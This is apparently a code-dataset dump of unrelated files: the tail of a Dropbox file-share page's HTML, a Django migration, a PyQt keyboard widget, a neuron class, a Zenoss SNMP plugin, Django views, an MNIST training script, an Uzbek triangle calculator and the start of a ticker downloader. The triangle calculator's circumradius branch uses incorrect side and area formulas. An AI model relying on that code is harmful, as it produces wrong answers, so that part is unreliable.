src="https://dt8kf6553cww8.cloudfront.net/static/images/icons128/page_white_code-vflEPhKac.png" class="bigicon" /><div class="filename shmodel-filename"><span id="pyxl473298661475077978"></span></div><div class="meta">7 weeks ago · 6.3 KB</div><a href="https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?dl=1&token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw" id="default_content_download_button" class="freshbutton-blue">Download</a><a class="freshbutton-lightblue" onclick="SharingModel.show_c2d_modal(); return false;" id="default_content_a2md">Copy to my Dropbox</a></div><div class="filename-below shmodel-filename"><span id="pyxl8906731819148669824"></span></div><div class="preview-box"><div id="code-wrapper" class="content-shadow"><div id="code-loading" class="center"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/ajax-loading-small-vfl3Wt7C_.gif" alt="" class="text-img" />Loading...</div><pre id="code" class="brush: py;"></pre></div></div><a href="/copyright_complaint?ssu=https%3A//www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py" class="content-flag title_bubble" rel="nofollow" title="Flag for copyright">Flag for copyright</a></div><div style="display:none;" id="disable-token-modal"><p class="disable-token-desc"></p><div class="modal-buttons"><input value="Remove link" type="button" class="freshbutton-blue" onclick="SharingModel.do_remove(Modal.vars);" /><input value="Cancel" type="button" class="freshbutton" onclick="Modal.hide();" /></div></div><div style="display:none;" id="album-disable-token-modal"><p>Are you sure you want to unshare <span class="album_unshare_name"></span>? 
Once it's unshared, nobody else will be able to view it.</p><div class="modal-buttons"><input value="Unshare" type="button" class="freshbutton-blue" onclick="SharingModel.do_remove(Modal.vars);" /><input value="Cancel" type="button" class="freshbutton" onclick="Modal.hide();" /></div></div><div style="display: none;" id="c2d-modal"><ul id="c2d-modal-tabs" class="modal-tabs clearfix"><li><a href="#" id="create-account" class="selected">Create an account</a></li><li><a href="#" id="login-account">Sign in</a></li></ul><div id="create-account-content"><p><span class="c2d-create-account-desc"></span></p><br /><div><form novalidate="novalidate" method="post" id="c2d-register-form"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><input type="hidden" name="signup_tag" value="copy_to_dropbox" /><div id="register-partial"><div style="display:none;" class="error-plain-text"><form:error name="fname" /></div><div id="fname-field" class="sick-input"><input autocomplete="off" tabindex="5" type="text" name="fname" id="fname" /><label id="fname-label" for="fname">First name</label></div><div style="display:none;" class="error-plain-text"><form:error name="lname" /></div><div id="lname-field" class="sick-input"><input autocomplete="off" tabindex="6" type="text" name="lname" id="lname" /><label id="lname-label" for="lname">Last name</label></div><div class="register-spacer"></div><div style="display:none;" class="error-plain-text"><form:error name="email" /></div><div id="email-field" class="sick-input clearfix"><input autocomplete="off" tabindex="7" type="email" name="email" id="email" /><label id="email-label" for="email">Email</label><div style="display: none;" id="email_check_warning"></div></div><div style="display:none;" class="error-plain-text"><form:error name="password" /></div><div id="password-field" class="sick-input"><input autocomplete="off" tabindex="8" type="password" name="password" id="password" /><label id="password-label" 
for="password">Password</label></div><div id="register-footer"><div id="tos-agree-field"><label for="tos_agree"><input type="checkbox" id="tos_agree" name="tos_agree" tabindex="9" /> I agree to <a href="/terms" target="_blank">Dropbox Terms</a></label><div style="display:none;" class="error-plain-text"><form:error name="tos_agree" /></div></div><input type="hidden" name="register-submit" value="1" /><input name="register-submit-dummy" value="Create account" class="freshbutton-blue" type="submit" id="register-submit" tabindex="10" /></div><br class="clear" /></div></form></div></div><div style="display:none;" id="login-account-content"><div id="c2d-login"><p><span class="c2d-login-desc"></span></p><br /><form novalidate="novalidate" method="post" id="c2d-login-form"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><input type="hidden" name="cont" value="https://www.dropbox.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?show_c2d_modal=true" /><table id="login-table"><tr><td><div style="display:none;" class="error-plain-text"><form:error name="login_email" /></div><div class="sick-input"><label for="email">Email</label><input autocomplete="off" type="text" name="login_email" tabindex="13" /></div></td></tr><tr><td style="padding: 10px 0;"><div style="display:none;" class="error-plain-text"><form:error name="login_password" /></div><div class="sick-input"><label for="password">Password</label><input autocomplete="off" type="password" name="login_password" tabindex="14" /></div></td></tr><tr><td><input style="float:right" name="login_submit" value="Sign in" class="freshbutton-blue" type="submit" id="login_submit" tabindex="15" /></td></tr></table></form></div><div style="display: none;" id="c2d-twofactor-login"><p class="c2d-header">Enter security code</p><p id="sms-msg">We sent a security code to your phone ending in <span class="last-four-digits"></span>.</p><p id="offline-msg">Enter the security code generated by your mobile authenticator app.</p><br 
/><form novalidate="novalidate" method="post" id="c2d-twofactor-login-form"><input type="hidden" name="t" value="8j8BaT-RNXpqPrZXN5bmAKpD" /><div id="c2d-twofactor-error" class="error-message"></div><div class="sick-input"><label for="email">6-digit code</label><input autocomplete="off" type="text" id="c2d-twofactor-code" name="twofactor_code" tabindex="13" /></div><input name="twofactor_login_submit" value="Submit code" class="freshbutton-blue" type="submit" id="twofactor_login_submit" tabindex="15" /><p class="resend-code"><a id="c2d-resend-link">Didn't receive one?</a></p></form></div></div></div>
<script type="text/template" id="lightbox_more_actions_item_tmpl">
<%
_id = (typeof _id !== 'undefined') ? _id : '';
_href = (typeof _href !== 'undefined') ? _href : '';
_target = (typeof _target !== 'undefined') ? _target : '';
more_classes = (typeof more_classes !== 'undefined') ? more_classes : '';
divider = ((typeof divider !== 'undefined') && (divider));
%>
<% if (divider) { %>
<li class="divider <%= more_classes %>" />
<% } else { %>
<li id="<%= _id %>" class="<%= more_classes %>" >
<a href="<%= _href %>" target="<%= _target %>">
<%= Sprite.html('web', sprite_name) %>
<div>
<%= item_text %>
</div>
</a>
</li>
<% } %>
</script>
<div style="display:none;" id="file-preview-modal"><div class="modal-preview-content"><div class="preview"><table class="preview-container-parent"><tr><td class="preview-container"><div class="preview-content"></div></td></tr></table></div> <div id="file-preview-menu" class="menu"><div class="file-title lightbox-not-important"><span class="album-name"> </span><span class="filename"> </span><span class="added-by"> </span></div><div class="actions"> </div><div class="paging lightbox-not-important"><div class="paging-block"><a href="#" class="prev"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_lightbox_prev" /></a><div class="lightbox-index-text-container"></div><a href="#" class="next"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_lightbox_next" /></a></div></div></div><div style="display:none;" id="lightbox-more-actions-menu" class="freshdropdown-menu big black chat-bubble-bottom"><ul id="lightbox-more-actions-list"></ul><div class="chat-bubble-arrow-border black"></div><div class="chat-bubble-arrow black"></div></div> <div style="display:none;" class="delete-file-prompt chat-bubble-bottom"><input type="button" id="lightbox-delete-photo" value="Delete" class="freshbutton-blue" /><br /><input type="button" id="lightbox-delete-cancel" value="Cancel" class="freshbutton" /><div class="chat-bubble-arrow-border black"></div><div class="chat-bubble-arrow black"></div></div></div><div class="header"><a href="#" class="close lightbox-not-important"><img src="https://dt8kf6553cww8.cloudfront.net/static/images/icons/icon_spacer-vflN3BYt2.gif" class=" sprite sprite_web s_web_lightbox_close" /></a></div></div></div><noscript><p class="center">The Dropbox website requires JavaScript.</p></noscript></div><div style="position: absolute; top: 0; left: 0; font-family: Courier" id="ieconsole"></div><div 
style="position:absolute; top:-10000px;width:0px; height:0px; left: 0;" id="FB_HiddenContainer"></div><div style="display:none;" id="notice-container" class="clearfix"></div><script src="https://dt8kf6553cww8.cloudfront.net/static/javascript/external/syntax-vflpNqebu.js" type="text/javascript"></script><script src="https://dt8kf6553cww8.cloudfront.net/static/coffee/compiled/logger-vflXdXO8C.js" type="text/javascript"></script><script src="https://dt8kf6553cww8.cloudfront.net/static/javascript/password_strength-vflwq0t9x.js" type="text/javascript"></script><script>
if (window.requirejs) {
requirejs(["dropbox"], function(dropbox) { SharingModel.init("RaspberryPiUptime.py", {"secure_hash": "", "subpath": "", "tkey": "zdgnrgum7zs8nal"}); SharingModel.set_team_only_shmodel(null, null);
$j('#print-button').click(function() {
requirejs(['print'], function(print) { print.print(); });
});
Util.remove_param_from_url('m');
SharingModel.init_file()
Util.smartLoad(function() {
Util.focus("");
Cookies.check_cookies_enabled();
WebTimingLogger.init();
});
$j("#pyxl9201789708051613151").text("RaspberryPiUptime.py".em_snippet(50, 0.750000));
$j("#pyxl473298661475077978").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
$j("#pyxl8906731819148669824").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
FilePreview.init_text("https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw", 1, null, 0)
window.c2d_tabs = new TabController("c2d-modal-tabs", {url_prefix: false})
Util.smartLoad(function () {
PasswordStrength.watch("password");
});
new MailCheck('email', 'email_check_warning');
});
} else {
var onload_js = function() { SharingModel.init("RaspberryPiUptime.py", {"secure_hash": "", "subpath": "", "tkey": "zdgnrgum7zs8nal"}); SharingModel.set_team_only_shmodel(null, null);
$j('#print-button').click(function() {
requirejs(['print'], function(print) { print.print(); });
});
Util.remove_param_from_url('m');
SharingModel.init_file()
Util.smartLoad(function() {
Util.focus("");
Cookies.check_cookies_enabled();
WebTimingLogger.init();
});
$j("#pyxl9201789708051613151").text("RaspberryPiUptime.py".em_snippet(50, 0.750000));
$j("#pyxl473298661475077978").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
$j("#pyxl8906731819148669824").text("RaspberryPiUptime.py".em_snippet(20, 0.750000));
FilePreview.init_text("https://dl.dropboxusercontent.com/s/zdgnrgum7zs8nal/RaspberryPiUptime.py?token_hash=AAFkDXJudM03AvF7JseUg8f4VJDlIfpAl9EIIu5bwRXIkw", 1, null, 0)
window.c2d_tabs = new TabController("c2d-modal-tabs", {url_prefix: false})
Util.smartLoad(function () {
PasswordStrength.watch("password");
});
new MailCheck('email', 'email_check_warning');
};
if (window.Prototype) {
document.observe('script:loaded', onload_js);
} else if (window.jQuery) {
jQuery(onload_js);
}
}
</script></body></html> |
19,716 | 7675ec468650282254f3fa87a41108050e7626f6 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2018-06-02 06:54
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Second migration of the ``posts`` app.

    Auto-generated by Django 1.10 (2018-06-02).  Deletes the obsolete
    ``PostManager`` model; per Django's ``DeleteModel`` semantics this also
    drops the model's database table when applied.
    """

    # Must run after the app's initial schema migration.
    dependencies = [
        ('posts', '0001_initial'),
    ]

    operations = [
        migrations.DeleteModel(
            name='PostManager',
        ),
    ]
|
19,717 | 475d0251248d1d454e6dd485c21de32c03d8d6e4 | import sys
import os
# Make the project's "src" and "ui" directories importable.
# NOTE(review): paths are built from the *current working directory*, so this
# assumes the app is launched from the project root -- confirm.
currentDir = os.getcwd()
sys.path.insert(0,currentDir+"/src")
sys.path.insert(0,currentDir+"/ui")
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import ui_textInput
import myUserSetup, myUserLogin, myUserEdit, myCheckUserInfo
# Three 29-entry keysets for the on-screen keyboard, chosen in
# updateKeyboardLayout():
#   [0] lowercase letters   (default)
#   [1] uppercase letters   (shiftPressed)
#   [2] digits/symbols      (numLockPressed)
# Indices 26-28 are '@', '.', ' ' in every keyset, matching the dedicated
# btnAt / btnDot / space buttons wired to handle_btn_key(26..28).
keyList=[\
['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.',' '] , \
['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','@','.',' '] , \
['-','_',',','$','3','#','?','!','8','%','^','=','*','+','9','0','1','4','/','5','7','~','2','>','6','<','@','.',' '] ]
class myTextInput(QWidget, ui_textInput.Ui_textInput):
def __init__(self, mainWindow, name=None, layoutSetting=None, dataStruc=None):
    """Build the on-screen keyboard widget and wire it for one input screen.

    Parameters:
        mainWindow    -- the application main window (owns the stacked central widget).
        name          -- accepted but unused; kept for interface compatibility.
        layoutSetting -- which screen to configure: one of "newUser_email",
                         "newUser_firstname", "newUser_lastname", "loginUser_email",
                         "editUser_firstname", "editUser_lastname".  Any other
                         value leaves the keyboard generic (no Next/Back wiring).
        dataStruc     -- user-info record; the field matching the screen
                         (email/firstname/lastname) pre-fills the input line.
    """
    super(myTextInput, self).__init__()
    self.setupUi(self)
    self.inputedText = str()
    self.shiftPressed = False
    self.numLockPressed = False
    self.updateKeyboardLayout()

    # Modifier / editing keys.
    self.btnShift.clicked.connect(lambda: self.handle_btnShift())
    self.btnToggle.clicked.connect(lambda: self.handle_btnToggle())
    self.btnDel.clicked.connect(lambda: self.handle_btnDel())

    # Character keys: buttons A..Z map to key indices 0..25; '@', '.' and
    # space are 26..28 (see keyList).  `checked` absorbs the bool emitted by
    # QPushButton.clicked so it cannot clobber the bound key index (classic
    # PyQt lambda-in-a-loop pitfall).
    for key_index, letter in enumerate("ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        getattr(self, letter).clicked.connect(
            lambda checked=False, idx=key_index: self.handle_btn_key(idx))
    self.btnAt.clicked.connect(lambda: self.handle_btn_key(26))
    self.btnDot.clicked.connect(lambda: self.handle_btn_key(27))
    self.space.clicked.connect(lambda: self.handle_btn_key(28))

    # Per-screen configuration.  The settings are mutually exclusive, so an
    # elif chain replaces the original independent ifs with no behavior change.
    if layoutSetting == "newUser_email":
        self._setup_screen(
            "New User Setup Wizard", "Email: ", dataStruc.email,
            lambda: self.handle_btn_login_newUser_email(mainWindow, dataStruc),
            lambda: myUserSetup.myUserSetup.newUser_gender(
                self, mainWindow=mainWindow, newUserInfo=dataStruc))
    elif layoutSetting == "newUser_firstname":
        self._disable_letter_only_keys()
        self._setup_screen(
            "New User Setup Wizard", "Firstname: ", dataStruc.firstname,
            lambda: self.handle_btn_login_newUser_firstname(mainWindow, dataStruc),
            lambda: myUserSetup.myUserSetup.newUser_email(
                self, mainWindow=mainWindow, newUserInfo=dataStruc))
    elif layoutSetting == "newUser_lastname":
        self._disable_letter_only_keys()
        self._setup_screen(
            "New User Setup Wizard", "Lastname: ", dataStruc.lastname,
            lambda: self.handle_btn_login_newUser_lastname(mainWindow, dataStruc),
            lambda: myUserSetup.myUserSetup.newUser_firstname(
                self, mainWindow=mainWindow, newUserInfo=dataStruc))
    elif layoutSetting == "loginUser_email":
        self._setup_screen(
            "User Login", "Email: ", dataStruc.email,
            lambda: self.handle_btn_login_loginUser_email(mainWindow, dataStruc),
            # Back on the login screen pops this widget off the stack instead
            # of navigating to another setup page.
            lambda: mainWindow.central_widget.removeWidget(
                mainWindow.central_widget.currentWidget()))
    elif layoutSetting == "editUser_firstname":
        self._disable_letter_only_keys()
        self._setup_screen(
            "Editing user details", "Firstname: ", dataStruc.firstname,
            lambda: self.handle_btn_login_editUser_firstname(mainWindow, dataStruc),
            lambda: myUserEdit.myUserEdit.editUser_genderUser_email(
                self, mainWindow=mainWindow, currentUserInfo=dataStruc))
    elif layoutSetting == "editUser_lastname":
        self._disable_letter_only_keys()
        self._setup_screen(
            "Editing user details", "Lastname: ", dataStruc.lastname,
            lambda: self.handle_btn_login_editUser_lastname(mainWindow, dataStruc),
            lambda: myUserEdit.myUserEdit.editUser_firstname(
                self, mainWindow=mainWindow, currentUserInfo=dataStruc))

def _disable_letter_only_keys(self):
    """Restrict the keyboard to letters for name fields: no '@', '.', or
    num-lock symbol set."""
    self.btnAt.setEnabled(False)
    self.btnDot.setEnabled(False)
    self.btnToggle.setEnabled(False)

def _setup_screen(self, title, field_label, initial_text, on_next, on_back):
    """Apply the wiring shared by every text-entry screen.

    Sets the title and field label, pre-fills the input line with
    *initial_text*, labels the action buttons "Next"/"Back", and connects
    them to the *on_next* / *on_back* callbacks.
    """
    self.lbl_title.setText(title)
    self.lbl_currentText.setText(field_label)
    self.btn_login.setText("Next")
    self.btn_back.setText("Back")
    self.inputedText = initial_text
    self.updateLineEdit()
    self.btn_login.clicked.connect(on_next)
    self.btn_back.clicked.connect(on_back)
def handle_btn_login_newUser_email(self, mainWindow, dataStruc):
    """Store the typed e-mail (also used as the username); on successful
    validation, advance the signup wizard to the first-name screen."""
    typed = self.inputedText
    dataStruc.email = typed
    dataStruc.username = typed
    # NOTE(review): "== True" kept deliberately in case checkUserDetails can
    # return non-bool truthy values -- confirm its contract before simplifying.
    if myCheckUserInfo.checkUserDetails(self, dataStruc, "email") == True:
        myUserSetup.myUserSetup.newUser_firstname(
            self, mainWindow=mainWindow, newUserInfo=dataStruc)
def handle_btn_login_newUser_firstname(self, mainWindow, dataStruc):
    """Store the typed first name; on successful validation, advance the
    signup wizard to the last-name screen."""
    dataStruc.firstname = self.inputedText
    validated = myCheckUserInfo.checkUserDetails(self, dataStruc, "firstname")
    # NOTE(review): "== True" kept to preserve the original's exact check.
    if validated == True:
        myUserSetup.myUserSetup.newUser_lastname(
            self, mainWindow=mainWindow, newUserInfo=dataStruc)
def handle_btn_login_newUser_lastname(self, mainWindow, dataStruc):
dataStruc.lastname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "lastname")==True):
myUserSetup.myUserSetup.newUser_dob(self,mainWindow=mainWindow,newUserInfo=dataStruc)
def handle_btn_login_loginUser_email(self, mainWindow, dataStruc):
dataStruc.email=self.inputedText
dataStruc.username=self.inputedText
myUserLogin.myUserLogin.loginUser_passcode(self,mainWindow=mainWindow,currentUserInfo=dataStruc,newUser=True)
def handle_btn_login_editUser_firstname(self, mainWindow, dataStruc):
dataStruc.firstname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "firstname")==True):
myUserEdit.myUserEdit.editUser_lastname(self,mainWindow=mainWindow,currentUserInfo=dataStruc)
def handle_btn_login_editUser_lastname(self, mainWindow, dataStruc):
dataStruc.lastname=self.inputedText
if(myCheckUserInfo.checkUserDetails(self,dataStruc, "lastname")==True):
myUserEdit.myUserEdit.editUser_dob(self,mainWindow=mainWindow,currentUserInfo=dataStruc)
def updateKeyboardLayout(self):
keyset = 0
if (self.shiftPressed == True): keyset = 1
if (self.numLockPressed == True): keyset = 2
self.A.setText(keyList[keyset][0])
self.B.setText(keyList[keyset][1])
self.C.setText(keyList[keyset][2])
self.D.setText(keyList[keyset][3])
self.E.setText(keyList[keyset][4])
self.F.setText(keyList[keyset][5])
self.G.setText(keyList[keyset][6])
self.H.setText(keyList[keyset][7])
self.I.setText(keyList[keyset][8])
self.J.setText(keyList[keyset][9])
self.K.setText(keyList[keyset][10])
self.L.setText(keyList[keyset][11])
self.M.setText(keyList[keyset][12])
self.N.setText(keyList[keyset][13])
self.O.setText(keyList[keyset][14])
self.P.setText(keyList[keyset][15])
self.Q.setText(keyList[keyset][16])
self.R.setText(keyList[keyset][17])
self.S.setText(keyList[keyset][18])
self.T.setText(keyList[keyset][19])
self.U.setText(keyList[keyset][20])
self.V.setText(keyList[keyset][21])
self.W.setText(keyList[keyset][22])
self.X.setText(keyList[keyset][23])
self.Y.setText(keyList[keyset][24])
self.Z.setText(keyList[keyset][25])
    def updateLineEdit(self):
        """Mirror the internal input buffer into the visible line-edit widget."""
        self.lineEdit_currentText.setText(self.inputedText)
def handle_btnDel(self):
self.inputedText = self.inputedText[:(len(self.inputedText)-1)]
self.updateLineEdit()
def handle_btn_key(self, charNum):
if (self.shiftPressed == True):
charPressed = keyList[1][charNum]
self.shiftPressed = False
self.updateKeyboardLayout()
elif (self.numLockPressed == True):
charPressed = keyList[2][charNum]
else :
charPressed = keyList[0][charNum]
self.inputedText += charPressed
self.updateLineEdit()
def handle_btnShift(self):
if (self.shiftPressed == False):
self.shiftPressed = True
self.numLockPressed = False
else:
self.shiftPressed = False
self.updateKeyboardLayout()
def handle_btnToggle(self):
if (self.numLockPressed == False):
self.numLockPressed = True
self.shiftPressed = False
else:
self.numLockPressed = False
self.updateKeyboardLayout()
def numOnlyMode(self):
self.numLockPressed = True
self.btnToggle.setEnabled(False)
self.btnShift.setEnabled(False)
self.updateKeyboardLayout()
self.A.setEnabled(False)
self.S.setEnabled(False)
self.D.setEnabled(False)
self.F.setEnabled(False)
self.G.setEnabled(False)
self.H.setEnabled(False)
self.J.setEnabled(False)
self.K.setEnabled(False)
self.L.setEnabled(False)
self.Z.setEnabled(False)
self.X.setEnabled(False)
self.C.setEnabled(False)
self.V.setEnabled(False)
self.B.setEnabled(False)
self.N.setEnabled(False)
self.M.setEnabled(False)
self.space.setEnabled(False)
self.btnAt.setEnabled(False)
|
19,718 | da5f1a6ec9b8231f61d592e9b17d2b6d7da9210c | from random import *
from math import exp
class Neuron:
    """A single sigmoid unit with randomly initialised weights."""
    def __init__(self, noInputs):
        # One weight per input connection, uniform in (-1, 1).
        self.noInputs = noInputs
        self.weights = [random() * 2 - 1 for _ in range(noInputs)]
        self.output = 0
        self.err = 0
    def activate(self, info):
        """Set self.output to sigmoid(dot(info, weights)).

        *info* is the list of upstream outputs; only its first
        noInputs entries are used.
        """
        weighted = sum(info[i] * self.weights[i] for i in range(self.noInputs))
        # sigmoidal activation
        self.output = 1 / (1.0 + exp(-weighted))
    def setErr(self, val):
        """Store the error *val* scaled by the sigmoid derivative o*(1-o)."""
        self.err = self.output * (1 - self.output) * val
|
19,719 | 6bb6d06f3985c75e2d17a67afb1630aa88c4cdb5 | ##############################################################################
#
# Copyright (C) Zenoss, Inc. 2008, all rights reserved.
#
# This content is made available according to terms specified in
# License.zenoss under the directory where your Zenoss product is installed.
#
##############################################################################
__doc__="""FalconDeviceMap
FalconDeviceMap maps the device level information for Falcon Environmental monitors.
"""
from Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetMap
from Products.DataCollector.plugins.DataMaps import MultiArgs
class FalconDeviceMap(SnmpPlugin):
    """SNMP modeler plugin mapping device-level data for Falcon monitors."""
    maptype = "FalconDeviceMap"
    # OIDs fetched in a single SNMP GET; values become keys of the getdata
    # dict handed to process().
    snmpGetMap = GetMap({
        '.1.3.6.1.2.1.1.2.0': 'sysObjectID',
        '.1.3.6.1.4.1.3184.1.1.1.1.1.0': 'manufacturer',
        '.1.3.6.1.4.1.3184.1.1.1.1.2.0': 'model',
        '.1.3.6.1.4.1.3184.1.1.1.1.3.0': 'firmwareVersion',
    })
    def process(self, device, results, log):
        """Build an object map from the SNMP results, or return None when the
        device's sysObjectID is outside the .1.3.6.1.4.1.3184.1.1 subtree.
        """
        log.info("processing %s for device %s", self.name(), device.id)
        getdata, tabledata = results
        if not getdata['sysObjectID'].startswith('.1.3.6.1.4.1.3184.1.1'):
            return None
        om = self.objectMap()
        # NOTE(review): 'manufacturer' is fetched above but unused; the vendor
        # is hard-coded as "RLE Technologies" -- confirm this is intentional.
        om.setHWProductKey = MultiArgs(getdata['model'], "RLE Technologies")
        om.setOSProductKey = MultiArgs(
            'Falcon OS ' + getdata['firmwareVersion'], "RLE Technologies")
        return om
|
19,720 | 7f9d6609889f5e95785ee14fa7516b746ad4c41e | from django.http import HttpResponse
from django.shortcuts import render
from education.models import School
def school_list(request):
    """Render all School objects with 'education/school_list.html'."""
    # Parameter renamed from the misspelled 'requset'; Django passes the
    # request positionally, so callers are unaffected.
    schools = School.objects.all()
    context = {
        'schools': schools,
    }
    return render(request, 'education/school_list.html', context)
def school_detail(request, school_id):
    """Render a single School; a missing id yields HTTP 404.

    The original `School.objects.get(...)` raised School.DoesNotExist (an
    unhandled 500) for unknown ids; get_object_or_404 is the canonical fix.
    """
    school = get_object_or_404(School, id=school_id)
    context = {
        # Key kept as 'schools' to match the existing template's variable.
        'schools': school,
    }
    return render(request, 'education/deatil.html', context)
19,721 | 59439691948bfe7780a45d3839bd53001a6af21c | import torch as t
import torch.nn as nn
import torchvision as tv
def load_data(batch_size=32, root=r'A:\DataSet\Mnist'):
    """Return (train_loader, test_loader) for MNIST stored under *root*.

    The dataset must already exist at *root*; images are only converted to
    tensors (no normalisation).  *root* was previously hard-coded; the
    default preserves the old behaviour.
    """
    transform = tv.transforms.Compose([tv.transforms.ToTensor()])
    train_set = tv.datasets.MNIST(root=root, transform=transform, train=True)
    print(train_set)
    train_loader = t.utils.data.DataLoader(
        train_set,
        batch_size=batch_size,
        shuffle=True,
        num_workers=4)
    test_set = tv.datasets.MNIST(root=root, transform=transform, train=False)
    print(test_set)
    test_loader = t.utils.data.DataLoader(
        test_set,
        batch_size=batch_size,
        shuffle=False,  # deterministic order for evaluation
        num_workers=4)
    return train_loader, test_loader
class Flatten(nn.Module):
    """Flatten every dimension after the batch one: (N, ...) -> (N, prod(...))."""
    def forward(self, into):
        # reshape (unlike view) also accepts non-contiguous inputs.
        return into.reshape(into.size(0), -1)
def run_model(batch_size=32, learning_rate=0.001, epochs=3):
    """Train a small CNN on MNIST and print per-epoch train/test metrics.

    Args:
        batch_size: mini-batch size for both loaders.
        learning_rate: Adam step size.
        epochs: number of passes over the training set.
    """
    train_loader, test_loader = load_data(batch_size)
    net = nn.Sequential(
        nn.Conv2d(1, 3, 3),
        nn.BatchNorm2d(3),
        nn.LeakyReLU(),
        nn.MaxPool2d(2, 2),
        nn.Conv2d(3, 5, 3),
        nn.BatchNorm2d(5),
        nn.LeakyReLU(),
        Flatten(),
        nn.Linear(5 * 11 * 11, 128),
        nn.Dropout(0.2),
        nn.ReLU(),
        nn.Linear(128, 10),
        # No Softmax here: nn.CrossEntropyLoss expects raw logits (it applies
        # log-softmax internally); softmax-before-CE squashes gradients.
        # The argmax predictions below are unaffected by this change.
    )
    # Kaiming init for convs, unit gamma for batch norms, small normal for
    # linear layers.
    for m in net.modules():
        if isinstance(m, nn.Conv2d):
            nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            if m.bias is not None:
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
            nn.init.constant_(m.weight, 1)
            nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.Linear):
            nn.init.normal_(m.weight, 0, 0.01)
            nn.init.constant_(m.bias, 0)
    device = t.device("cuda:0" if t.cuda.is_available() else "cpu")
    net.to(device)
    criterion = nn.CrossEntropyLoss()
    optimizer = t.optim.Adam(net.parameters(), lr=learning_rate)
    for epoch in range(epochs):
        net = net.train()
        train_loss, train_accuracy = 0, 0
        for n, (inputs, labels) in enumerate(train_loader):
            inputs = inputs.to(device)
            # Keep labels on the model's device; the previous
            # `.to(device).type(t.LongTensor)` silently moved them back to
            # the CPU and would crash under CUDA.
            labels = labels.to(device, dtype=t.long)
            outputs = net(inputs)
            loss = criterion(outputs, labels)
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            train_loss += loss.item()
            _, predict = t.max(outputs, 1)
            # NOTE: the last batch may be smaller than batch_size, so this is
            # a close approximation of the exact epoch accuracy.
            train_accuracy += (predict == labels).sum().item() / batch_size
        train_loss /= n + 1
        train_accuracy /= n + 1
        print(f'epoch: {epoch}, train_loss: {train_loss:.4f}, train_accuracy: {train_accuracy:.4f}')
        net = net.eval()
        test_accuracy = 0
        with t.no_grad():  # evaluation needs no autograd bookkeeping
            # Evaluate on the TEST split; the original looped over
            # train_loader here and reported train accuracy as test accuracy.
            for n, (inputs, labels) in enumerate(test_loader):
                inputs = inputs.to(device)
                labels = labels.to(device)
                outputs = net(inputs)
                _, predict = t.max(outputs, 1)
                test_accuracy += (predict == labels).sum().item() / batch_size
        test_accuracy /= n + 1
        print(f'epoch: {epoch}, test_accuracy: {test_accuracy:.4f}')
if __name__ == '__main__':
    BATCH_SIZE = 16
    # Pass the constant through: previously BATCH_SIZE was defined but never
    # used, so run_model silently fell back to its default of 32.
    run_model(batch_size=BATCH_SIZE)
19,722 | 12e7e71ce9be0a4e5f4e0a81e125accde5cd3cdf | print("\n1-tomoni, 2-ich.chz.ayl.radiusi, 3-tash.chz.ayl.radiusi, 4-Yuza")
a=int(input("Istalgan o'lchov turini tanlang: => "))
b=float(input("Endi uning qiymatini kiriting: => "))
if a==1:
print(f"Tomoni: a={b} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={b*(3**(1/2))/6} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={b*(3**(1/2))/3} ga teng.")
print(f"Yuzasi: S={(b**2)*(3**(1/2))/4} ga teng.")
elif a==2:
print(f"Tomoni: a={2*(3**(1/2))*b} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={b} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={2*b} ga teng.")
print(f"Yuzasi: S={3*(3**(1/2))*b**2} ga teng.")
elif a==3:
print(f"Tomoni: a={b/(3**(1/2))} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={b/2} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={b} ga teng.")
print(f"Yuzasi: S={3**(3**(1/2))/4*b**2} ga teng.")
elif a==4:
print(f"Tomoni: a={((4*b)/(3**(1/2)))**(1/2)} ga teng.")
print(f"Ich.chz.ayl.radiusi: r={(b/(3*(3**(1/2))))} ga teng.")
print(f"Tash.chz.ayl.radiusi: R={(4*b/(3*(3**(1/2))))} ga teng.")
print(f"Yuzasi: S={b} ga teng.")
else:
print("[1;4] oraliqda kiriting...") |
19,723 | b0020116b58da15de6283b05424655aad3d4f6d1 | import requests
import string
from time import sleep
import math
from ytd.compat import text
from ytd.compat import quote
user_agent = 'yahoo-ticker-symbol-downloader'
general_search_characters = 'abcdefghijklmnopqrstuvwxyz0123456789.='
first_search_characters = 'abcdefghijklmnopqrstuvwxyz'
class SymbolDownloader:
    """Abstract class"""
    # Collects ticker symbols of one security type by walking Yahoo's
